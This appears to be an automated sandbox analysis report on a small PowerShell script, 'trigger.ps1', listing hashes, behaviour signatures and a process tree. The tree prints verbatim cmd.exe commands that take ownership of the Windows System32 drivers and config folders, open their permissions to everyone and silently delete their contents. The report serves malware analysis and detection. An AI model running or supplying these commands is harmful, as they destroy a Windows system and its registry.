Analysis

  • max time kernel
    2s
  • max time network
    1s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    13-08-2024 20:52

General

  • Target

    trigger.ps1

  • Size

    361B

  • MD5

    f027721d34b4dd5220b236a39b0f75a8

  • SHA1

    b31847f44624ca0c7a53cd9a01f187bad6c4e88c

  • SHA256

    c0979852c32530744818450613b30e9bb81ee684239d189034ed3cee80fb5ae6

  • SHA512

    74d9aaf78e525a90cff77a32aed86a4fa594be69bec74ea354f1b471818fbef42616ee5b9cbdea0faaafe2d2d7d5f6a9b4b97be0dc91e528837fa3f8ac281b48

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && exit"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\drivers\*
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\drivers\* /grant everyone:(f)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2888
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\config\*
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2724
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\config\* /grant everyone:(f)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2756

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2700-4-0x000007FEF66DE000-0x000007FEF66DF000-memory.dmp

    Filesize

    4KB

  • memory/2700-5-0x000000001B550000-0x000000001B832000-memory.dmp

    Filesize

    2.9MB

  • memory/2700-6-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

  • memory/2700-7-0x000007FEF6420000-0x000007FEF6DBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2700-8-0x000007FEF6420000-0x000007FEF6DBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2700-9-0x000007FEF6420000-0x000007FEF6DBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2700-10-0x000007FEF6420000-0x000007FEF6DBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2700-11-0x000007FEF6420000-0x000007FEF6DBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2700-12-0x000007FEF6420000-0x000007FEF6DBD000-memory.dmp

    Filesize

    9.6MB